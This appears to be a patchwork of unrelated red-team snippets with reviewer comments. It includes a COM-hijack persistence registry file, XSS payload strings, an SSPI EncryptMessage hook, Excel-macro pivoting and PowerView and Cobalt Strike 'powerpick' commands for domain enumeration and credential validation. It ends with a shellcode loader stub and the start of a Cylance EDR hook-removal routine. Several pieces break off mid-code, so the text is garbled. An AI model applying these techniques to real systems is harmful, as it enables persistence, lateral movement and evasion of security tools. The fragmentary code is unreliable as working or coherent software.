Windows Registry Editor Version 5.00 | |
; NOTE(review): registers an in-process COM server for this CLSID in the *per-user*
; hive (HKCU\Software\Classes). No admin rights are needed to write here, and the
; per-user Classes key is consulted ahead of the machine-wide HKLM\Software\Classes
; entry, so any process that instantiates this CLSID will load the DLL below into
; itself. This is the classic "COM hijack" persistence layout (presumed intent; the
; CLSID's legitimate owner is not shown here). No ThreadingModel value is set.
; Detection: alert on value-set events under HKCU\Software\Classes\CLSID\*\InProcServer32
; (e.g. Sysmon Event ID 13).
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}] | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32] | |
; Default value = path of the DLL to load. This points at an x86 *Debug* build inside a
; developer profile: it will only exist on that box, and a 32-bit DLL cannot be loaded
; by a 64-bit COM client, so the path/bitness must be adjusted before this is deployed.
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll" |
''"> | |
”><script>alert(“X”)</script> | |
’><script>alert(1)</script> | |
"><script>alert(1)</script> | |
'><script>alert(1)</script> | |
' '><script>alert(1)</script> | |
"><script>alert(1)</script> | |
'><script>alert(1)</script> | |
<script>alert(1)</script> | |
"><script>alert(1)</script> |
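// Registry hive handle, presumably for WMI StdRegProv-style calls (the consumer is not shown here).
// NOTE: 0x80000000 is HKEY_CLASSES_ROOT, not HKEY_LOCAL_MACHINE as the previous comment claimed;
// HKLM is 0x80000002 (see the table below). Passing HKCR where HKLM was intended silently
// reads/writes the wrong hive, so the label matters.
var HKCR = 0x80000000;
/*
  VBScript equivalents of the standard predefined hive handles, for reference:
  Const HKCR = &H80000000 'HKEY_CLASSES_ROOT
  Const HKCU = &H80000001 'HKEY_CURRENT_USER
  Const HKLM = &H80000002 'HKEY_LOCAL_MACHINE
  Const HKU  = &H80000003 'HKEY_USERS
  Const HKCC = &H80000005 'HKEY_CURRENT_CONFIG
*/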
# | |
# NB : this is NOT encryption. Repeating-key XOR leaks the key under known plaintext
#      (XOR the ciphertext with any known plaintext bytes and the key falls out), and the
#      hardcoded default key is public. Treat it as obfuscation only; never rely on it for
#      secrecy or integrity of data a user controls (e.g. a querystring parameter).
# from http://code.activestate.com/recipes/266586-simple-xor-keyword-encryption/
# added base64 encoding for simple querystring :) -- note standard base64 output contains
#      '+', '/' and '=', which must be URL-encoded (or use urlsafe_b64encode) before it is
#      safe to embed in a querystring. The itertools.izip import below is Python 2 only.
# | |
def xor_crypt_string(data, key='awesomepassword', encode=False, decode=False): | |
from itertools import izip, cycle | |
import base64 | |
if decode: |
#define SECURITY_WIN32 //Define First Before Imports. | |
#include <windows.h> | |
#include <stdio.h> | |
#include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies | |
FARPROC fpEncryptMessage; // Resolved address of the original EncryptMessage (SSPI, secur32.dll -
                          // presumed from the Sspi.h include above); the hook resumes / restores
                          // through this pointer. Not initialised at this point in the file.
BYTE bSavedByte;          // Original first byte at fpEncryptMessage, saved before it is overwritten
                          // with 0xCC (INT3) so the breakpoint-style hook can be undone and the
                          // real call resumed. NOTE(review): a single global saved byte means the
                          // patch/restore cycle is not safe if EncryptMessage is entered from
                          // several threads at once - verify how the handler serialises access.
function Invoke-ExcelMacroPivot{ | |
<# | |
.AUTHOR | |
Matt Nelson (@enigma0x3) | |
.SYNOPSIS | |
Pivots to a remote host by using an Excel macro and Excel's COM object | |
.PARAMETER Target | |
Remote host to pivot to | |
.PARAMETER RemoteDocumentPath | |
Local path on the remote host where the payload resides |
# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
Get-DomainGroup -MemberIdentity <User/Group> | |
# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity "Domain Admins" -Recurse | |
# use an alternate credential for any function
# NOTE(review): ConvertTo-SecureString -AsPlainText puts the password on the command line,
# so it ends up in PowerShell history, transcripts and script-block logs (and in any C2
# console log). Fine for a throwaway lab account as shown; for real credentials build
# $Cred with Get-Credential or Read-Host -AsSecureString instead.
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword); Get-DomainUser -Credential $Cred | |
# retrieve all the computer dns host names a GPP password applies to |
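# Hunting files on domain controllers:
# NOTE: -match takes a regex. The original ".vbs" / ".exe" patterns were unanchored and used
# "." as a wildcard, so they also matched names like "xvbsfoo.txt" or "setup.exe.old";
# escape the dot and anchor the extension to the end of the name.
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match '\.vbs$'}
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match '\.exe$'}
# Validating password
# NOTE: ValidateCredentials performs a real logon against <DC-hostname>: a wrong password
# typically counts toward the account's lockout threshold and is logged on the DC, and the
# cleartext password is recorded with the command line in your Beacon/C2 log. Check the
# lockout policy first and keep it to one attempt per account.
powerpick Add-Type -AssemblyName System.DirectoryServices.AccountManagement;$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain;$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, '<DC-hostname>');$principalContext.ValidateCredentials('<username>', '<password>')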
# Curated output for listing processes (WMI) | |
powerpick $Password = ConvertTo-SecureString "<password>" -asplaintext -force; $Credential = New-Object -Typename System.Management.Automation.PSCredential -ArgumentList "<DOMAIN\username>",$Password;Get-WMIObject Win32_Process -computername <target-hostname> -Credential $Credential| ?{$_.GetOwner().User -NotLike 'SYSTEM' -and $_.GetOwner().User -NotLike "*SERVICE"} | select ProcessID,Name,@{n |
#include <iostream> | |
#include <windows.h> | |
// Payload bytes, pasted in as a C string literal (e.g. the output of msfvenom -f c).
// NOTE(review): a string literal appends a trailing '\0', so sizeof(buf) is the payload
// length + 1; harmless for most loaders, but do not treat sizeof(buf) as the exact size.
unsigned char buf[] = { "SHELLCODE_GOES_HERE" };
// Per-OS-version record; only the version discriminator is present here. Presumably the
// actual syscall numbers are selected from it elsewhere (not visible in this excerpt).
struct syscall_table
{
    int osVersion; // Windows version/build this entry applies to (encoding not shown here)
};
// Remove Cylance hook from DLL export | |
void removeCylanceHook(const char *dll, const char *apiName, char code) { | |
DWORD old, newOld; |